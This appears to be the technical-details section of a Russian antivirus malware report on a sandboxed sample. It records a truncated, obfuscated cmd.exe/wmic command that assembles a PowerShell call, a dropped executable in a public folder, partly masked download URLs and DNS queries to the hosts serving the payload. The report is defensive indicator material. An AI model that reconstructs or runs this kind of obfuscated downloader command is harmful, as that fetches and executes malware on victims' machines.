Техническая информация
- '<SYSTEM32>\cmd.exe' wmic & %comspec% /v /c set %aBBWGTEvJwLrsGO%=aLjndvjJU&&set %VGzdwfidr%=w^er^s&&set %IVNjpQwrpDDcpTB%=fAOMFbnlG&&set %pqXksRBqm%=p^o&&set %XFiSwfhurhNkGYG%=tzTCoCmksiHcjUD&&set %i...
- C:\users\public\323656.exe
- C:\users\public\323656.exe
- 're####-shlangov.ru':80
- 'le####licidad.com':80
- 'mo######ointeligente.com.ar':80
- http://re####-shlangov.ru/Q/
- http://www.le####licidad.com/jtvsZO/
- http://mo######ointeligente.com.ar/gkNuNKlYK/
- DNS ASK re###t-britv.ru
- DNS ASK re####-shlangov.ru
- DNS ASK le####licidad.com
- DNS ASK mo######ointeligente.com.ar
- DNS ASK ed##spb.ru
- '<SYSTEM32>\cmd.exe' wmic & %comspec% /v /c set %aBBWGTEvJwLrsGO%=aLjndvjJU&&set %VGzdwfidr%=w^er^s&&set %IVNjpQwrpDDcpTB%=fAOMFbnlG&&set %pqXksRBqm%=p^o&&set %XFiSwfhurhNkGYG%=tzTCoCmksiHcjUD&&set %i...' (со скрытым окном)